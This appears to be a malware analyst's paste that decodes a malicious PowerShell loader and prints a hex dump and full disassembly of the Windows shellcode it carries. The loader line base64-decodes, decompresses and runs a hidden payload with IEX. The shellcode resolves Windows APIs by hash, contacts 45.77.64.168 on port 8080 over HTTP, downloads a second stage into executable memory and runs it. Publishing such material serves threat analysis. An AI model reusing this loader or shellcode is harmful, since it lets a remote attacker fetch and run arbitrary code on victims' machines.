James_inthe_box

Decoded

Nov 28th, 2017
  1. $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
  2.  
  3. final
  4. Hex dump: fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 6e 65 74 00 68 77 69 6e 69 54 68 4c 77 26 07 ff d5 e8 80 00 00 00 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 38 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20 54 72 69 64 65 6e 74 2f 34 2e 30 29 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 59 31 ff 57 57 57 57 51 68 3a 56 79 a7 ff d5 eb 79 5b 31 c9 51 51 6a 03 51 51 68 90 1f 00 00 53 50 68 57 89 9f c6 ff d5 eb 62 59 31 d2 52 68 00 02 60 84 52 52 52 51 52 50 68 eb 55 2e 3b ff d5 89 c6 31 ff 57 57 57 57 56 68 2d 06 18 7b ff d5 85 c0 74 44 31 ff 85 f6 74 04 89 f9 eb 09 68 aa c5 e2 5d ff d5 89 c1 68 45 21 5e 31 ff d5 31 ff 57 6a 07 51 56 50 68 b7 57 e0 0b ff d5 bf 00 2f 00 00 39 c7 74 bc 31 ff eb 15 eb 49 e8 99 ff ff ff 2f 49 4a 57 72 00 00 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 57 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 e2 ff d5 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 e8 37 ff ff ff 34 35 2e 37 37 2e 36 34 2e 31 36 38 00
  5. 0x00000000 fc cld
  6. 0x00000001 e889000000 call 0x0000008f
  7. 0x00000006 60 pushad
  8. 0x00000007 89e5 mov ebp,esp
  9. 0x00000009 31d2 xor edx,edx
  10. 0x0000000b 648b5230 fs: mov edx,dword [edx + 48]
  11. 0x0000000f 8b520c mov edx,dword [edx + 12]
  12. 0x00000012 8b5214 mov edx,dword [edx + 20]
  13. 0x00000015 8b7228 mov esi,dword [edx + 40]
  14. 0x00000018 0fb74a26 movzx ecx,word [edx + 38]
  15. 0x0000001c 31ff xor edi,edi
  16. 0x0000001e 31c0 xor eax,eax
  17. 0x00000020 ac lodsb
  18. 0x00000021 3c61 cmp al,97
  19. 0x00000023 7c02 jl 0x00000027
  20. 0x00000025 2c20 sub al,32
  21. 0x00000027 c1cf0d ror edi,13
  22. 0x0000002a 01c7 add edi,eax
  23. 0x0000002c e2f0 loop 0x0000001e
  24. 0x0000002e 52 push edx
  25. 0x0000002f 57 push edi
  26. 0x00000030 8b5210 mov edx,dword [edx + 16]
  27. 0x00000033 8b423c mov eax,dword [edx + 60]
  28. 0x00000036 01d0 add eax,edx
  29. 0x00000038 8b4078 mov eax,dword [eax + 120]
  30. 0x0000003b 85c0 test eax,eax
  31. 0x0000003d 744a jz 0x00000089
  32. 0x0000003f 01d0 add eax,edx
  33. 0x00000041 50 push eax
  34. 0x00000042 8b4818 mov ecx,dword [eax + 24]
  35. 0x00000045 8b5820 mov ebx,dword [eax + 32]
  36. 0x00000048 01d3 add ebx,edx
  37. 0x0000004a e33c jecxz 0x00000088
  38. 0x0000004c 49 dec ecx
  39. 0x0000004d 8b348b mov esi,dword [ebx + ecx * 4]
  40. 0x00000050 01d6 add esi,edx
  41. 0x00000052 31ff xor edi,edi
  42. 0x00000054 31c0 xor eax,eax
  43. 0x00000056 ac lodsb
  44. 0x00000057 c1cf0d ror edi,13
  45. 0x0000005a 01c7 add edi,eax
  46. 0x0000005c 38e0 cmp al,ah
  47. 0x0000005e 75f4 jnz 0x00000054
  48. 0x00000060 037df8 add edi,dword [ebp - 8]
  49. 0x00000063 3b7d24 cmp edi,dword [ebp + 36]
  50. 0x00000066 75e2 jnz 0x0000004a
  51. 0x00000068 58 pop eax
  52. 0x00000069 8b5824 mov ebx,dword [eax + 36]
  53. 0x0000006c 01d3 add ebx,edx
  54. 0x0000006e 668b0c4b mov cx,word [ebx + ecx * 2]
  55. 0x00000072 8b581c mov ebx,dword [eax + 28]
  56. 0x00000075 01d3 add ebx,edx
  57. 0x00000077 8b048b mov eax,dword [ebx + ecx * 4]
  58. 0x0000007a 01d0 add eax,edx
  59. 0x0000007c 89442424 mov dword [esp + 36],eax
  60. 0x00000080 5b pop ebx
  61. 0x00000081 5b pop ebx
  62. 0x00000082 61 popad
  63. 0x00000083 59 pop ecx
  64. 0x00000084 5a pop edx
  65. 0x00000085 51 push ecx
  66. 0x00000086 ffe0 jmp eax
  67. 0x00000088 58 pop eax
  68. 0x00000089 5f pop edi
  69. 0x0000008a 5a pop edx
  70. 0x0000008b 8b12 mov edx,dword [edx]
  71. 0x0000008d eb86 jmp 0x00000015
  72. 0x0000008f 5d pop ebp
  73. 0x00000090 686e657400 push 0x0074656e--> 'ten'
  74. 0x00000095 6877696e69 push 0x696e6977--> 'iniw'
  75. 0x0000009a 54 push esp
  76. 0x0000009b 684c772607 push 0x0726774c--> '&wL'
  77. 0x000000a0 ffd5 call ebp --> kernel32.dll!LoadLibraryA
  78. 0x000000a2 e880000000 call 0x00000127
  79. 0x000000a7 4d dec ebp
  80. 0x000000a8 6f outsd edx,dword [esi]
  81. 0x000000a9 7a69 jpe 0x00000114
  82. 0x000000ab 6c insb byte [esi],edx
  83. 0x000000ac 6c insb byte [esi],edx
  84. 0x000000ad 61 popad
  85. 0x000000ae 2f das
  86. 0x000000af 342e xor al,46
  87. 0x000000b1 3020 xor byte [eax],ah
  88. 0x000000b3 28636f sub byte [ebx + 111],ah
  89. 0x000000b6 6d insd dword [esi],edx
  90. 0x000000b7 7061 jo 0x0000011a
  91. 0x000000b9 7469 jz 0x00000124
  92. 0x000000bb 626c653b bound ebp,dword [ebp + 59]
  93. 0x000000bf 204d53 and byte [ebp + 83],cl
  94. 0x000000c2 49 dec ecx
  95. 0x000000c3 45 inc ebp
  96. 0x000000c4 2038 and byte [eax],bh
  97. 0x000000c6 2e303b cs: xor byte [ebx],bh
  98. 0x000000c9 205769 and byte [edi + 105],dl
  99. 0x000000cc 6e outsb edx,byte [esi]
  100. 0x000000cd 646f fs: outsd edx,dword [esi]
  101. 0x000000cf 7773 ja 0x00000144
  102. 0x000000d1 204e54 and byte [esi + 84],cl
  103. 0x000000d4 20352e313b20 and byte [0x203b312e],dh
  104. 0x000000da 54 push esp
  105. 0x000000db 7269 jc 0x00000146
  106. 0x000000dd 64656e fsgs: outsb edx,byte [esi]
  107. 0x000000e0 742f jz 0x00000111
  108. 0x000000e2 342e xor al,46
  109. 0x000000e4 3029 xor byte [ecx],ch
  110. 0x000000e6 005858 add byte [eax + 88],bl
  111. 0x000000e9 58 pop eax
  112. 0x000000ea 58 pop eax
  113. 0x000000eb 58 pop eax
  114. 0x000000ec 58 pop eax
  115. 0x000000ed 58 pop eax
  116. 0x000000ee 58 pop eax
  117. 0x000000ef 58 pop eax
  118. 0x000000f0 58 pop eax
  119. 0x000000f1 58 pop eax
  120. 0x000000f2 58 pop eax
  121. 0x000000f3 58 pop eax
  122. 0x000000f4 58 pop eax
  123. 0x000000f5 58 pop eax
  124. 0x000000f6 58 pop eax
  125. 0x000000f7 58 pop eax
  126. 0x000000f8 58 pop eax
  127. 0x000000f9 58 pop eax
  128. 0x000000fa 58 pop eax
  129. 0x000000fb 58 pop eax
  130. 0x000000fc 58 pop eax
  131. 0x000000fd 58 pop eax
  132. 0x000000fe 58 pop eax
  133. 0x000000ff 58 pop eax
  134. 0x00000100 58 pop eax
  135. 0x00000101 58 pop eax
  136. 0x00000102 58 pop eax
  137. 0x00000103 58 pop eax
  138. 0x00000104 58 pop eax
  139. 0x00000105 58 pop eax
  140. 0x00000106 58 pop eax
  141. 0x00000107 58 pop eax
  142. 0x00000108 58 pop eax
  143. 0x00000109 58 pop eax
  144. 0x0000010a 58 pop eax
  145. 0x0000010b 58 pop eax
  146. 0x0000010c 58 pop eax
  147. 0x0000010d 58 pop eax
  148. 0x0000010e 58 pop eax
  149. 0x0000010f 58 pop eax
  150. 0x00000110 58 pop eax
  151. 0x00000111 58 pop eax
  152. 0x00000112 58 pop eax
  153. 0x00000113 58 pop eax
  154. 0x00000114 58 pop eax
  155. 0x00000115 58 pop eax
  156. 0x00000116 58 pop eax
  157. 0x00000117 58 pop eax
  158. 0x00000118 58 pop eax
  159. 0x00000119 58 pop eax
  160. 0x0000011a 58 pop eax
  161. 0x0000011b 58 pop eax
  162. 0x0000011c 58 pop eax
  163. 0x0000011d 58 pop eax
  164. 0x0000011e 58 pop eax
  165. 0x0000011f 58 pop eax
  166. 0x00000120 58 pop eax
  167. 0x00000121 58 pop eax
  168. 0x00000122 58 pop eax
  169. 0x00000123 58 pop eax
  170. 0x00000124 58 pop eax
  171. 0x00000125 58 pop eax
  172. 0x00000126 005931 add byte [ecx + 49],bl
  173. 0x00000129 ff5757 call dword [edi + 87]
  174. 0x0000012c 57 push edi
  175. 0x0000012d 57 push edi
  176. 0x0000012e 51 push ecx
  177. 0x0000012f 683a5679a7 push 0xa779563a--> 'yV:'
  178. 0x00000134 ffd5 call ebp --> wininet.dll!InternetOpenA
  179. 0x00000136 eb79 jmp 0x000001b1
  180. 0x00000138 5b pop ebx
  181. 0x00000139 31c9 xor ecx,ecx
  182. 0x0000013b 51 push ecx
  183. 0x0000013c 51 push ecx
  184. 0x0000013d 6a03 push 3
  185. 0x0000013f 51 push ecx
  186. 0x00000140 51 push ecx
  187. 0x00000141 68901f0000 push 0x00001f90
  188. 0x00000146 53 push ebx
  189. 0x00000147 50 push eax
  190. 0x00000148 6857899fc6 push 0xc69f8957
  191. 0x0000014d ffd5 call ebp --> wininet.dll!InternetConnectA
  192. 0x0000014f eb62 jmp 0x000001b3
  193. 0x00000151 59 pop ecx
  194. 0x00000152 31d2 xor edx,edx
  195. 0x00000154 52 push edx
  196. 0x00000155 6800026084 push 0x84600200
  197. 0x0000015a 52 push edx
  198. 0x0000015b 52 push edx
  199. 0x0000015c 52 push edx
  200. 0x0000015d 51 push ecx
  201. 0x0000015e 52 push edx
  202. 0x0000015f 50 push eax
  203. 0x00000160 68eb552e3b push 0x3b2e55eb--> ';.U'
  204. 0x00000165 ffd5 call ebp --> wininet.dll!HttpOpenRequestA
  205. 0x00000167 89c6 mov esi,eax
  206. 0x00000169 31ff xor edi,edi
  207. 0x0000016b 57 push edi
  208. 0x0000016c 57 push edi
  209. 0x0000016d 57 push edi
  210. 0x0000016e 57 push edi
  211. 0x0000016f 56 push esi
  212. 0x00000170 682d06187b push 0x7b18062d--> '{-'
  213. 0x00000175 ffd5 call ebp --> wininet.dll!HttpSendRequestA
  214. 0x00000177 85c0 test eax,eax
  215. 0x00000179 7444 jz 0x000001bf
  216. 0x0000017b 31ff xor edi,edi
  217. 0x0000017d 85f6 test esi,esi
  218. 0x0000017f 7404 jz 0x00000185
  219. 0x00000181 89f9 mov ecx,edi
  220. 0x00000183 eb09 jmp 0x0000018e
  221. 0x00000185 68aac5e25d push 0x5de2c5aa
  222. 0x0000018a ffd5 call ebp --> kernel32.dll!GetLastError
  223. 0x0000018c 89c1 mov ecx,eax
  224. 0x0000018e 6845215e31 push 0x315e2145--> '1^!E'
  225. 0x00000193 ffd5 call ebp
  226. 0x00000195 31ff xor edi,edi
  227. 0x00000197 57 push edi
  228. 0x00000198 6a07 push 7
  229. 0x0000019a 51 push ecx
  230. 0x0000019b 56 push esi
  231. 0x0000019c 50 push eax
  232. 0x0000019d 68b757e00b push 0x0be057b7--> '
  233. W'
  234. 0x000001a2 ffd5 call ebp --> wininet.dll!InternetErrorDlg
  235. 0x000001a4 bf002f0000 mov edi,0x00002f00
  236. 0x000001a9 39c7 cmp edi,eax
  237. 0x000001ab 74bc jz 0x00000169
  238. 0x000001ad 31ff xor edi,edi
  239. 0x000001af eb15 jmp 0x000001c6
  240. 0x000001b1 eb49 jmp 0x000001fc
  241. 0x000001b3 e899ffffff call 0x00000151
  242. 0x000001b8 2f das
  243. 0x000001b9 49 dec ecx
  244. 0x000001ba 4a dec edx
  245. 0x000001bb 57 push edi
  246. 0x000001bc 7200 jc 0x000001be
  247. 0x000001be 0068f0 add byte [eax - 16],ch
  248. 0x000001c1 b5a2 mov ch,162
  249. 0x000001c3 56 push esi
  250. 0x000001c4 ffd5 call ebp
  251. 0x000001c6 6a40 push 64
  252. 0x000001c8 6800100000 push 4096
  253. 0x000001cd 6800004000 push 0x00400000
  254. 0x000001d2 57 push edi
  255. 0x000001d3 6858a453e5 push 0xe553a458--> 'SX'
  256. 0x000001d8 ffd5 call ebp --> kernel32.dll!VirtualAlloc
  257. 0x000001da 93 xchg eax,ebx
  258. 0x000001db 53 push ebx
  259. 0x000001dc 53 push ebx
  260. 0x000001dd 89e7 mov edi,esp
  261. 0x000001df 57 push edi
  262. 0x000001e0 6800200000 push 0x00002000
  263. 0x000001e5 53 push ebx
  264. 0x000001e6 56 push esi
  265. 0x000001e7 68129689e2 push 0xe2899612
  266. 0x000001ec ffd5 call ebp --> wininet.dll!InternetReadFile
  267. 0x000001ee 85c0 test eax,eax
  268. 0x000001f0 74cd jz 0x000001bf
  269. 0x000001f2 8b07 mov eax,dword [edi]
  270. 0x000001f4 01c3 add ebx,eax
  271. 0x000001f6 85c0 test eax,eax
  272. 0x000001f8 75e5 jnz 0x000001df
  273. 0x000001fa 58 pop eax
  274. 0x000001fb c3 ret
  275. 0x000001fc e837ffffff call 0x00000138
  276. 0x00000201 3435 xor al,53
  277. 0x00000203 2e37 cs: aaa
  278. 0x00000205 37 aaa
  279. 0x00000206 2e36342e csss: xor al,46
  280. 0x0000020a 3136 xor dword [esi],esi
  281. 0x0000020c 3800 cmp byte [eax],al
  282.  
  283. Byte Dump:
  284. ......`..1.d.R0.R.R..r(..J&1.1..<a|.,......RW.R..B<...@x..tJ..P.H..X...<I.4...1.1......8.u..}.;}$u.X.X$..f.K.X.........D$$[[aYZQ..X_Z....]hnet.hwiniThLw&........Mozilla/4.0(compatible;MSIE8.0;WindowsNT5.1;Trident/4.0).XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.Y1.WWWWQh:Vy....y[1.QQj.QQh....SPhW......bY1.Rh..`.RRRQRPh.U.;....1.WWWWVh-..{....tD1...t....h...]....hE!^1..1.Wj.QVPh.W...../..9.t.1....I...../IJWr..h...V..j@h....h..@.WhX.S....SS..Wh...SVh........t.......u.X..7...45.77.64.168.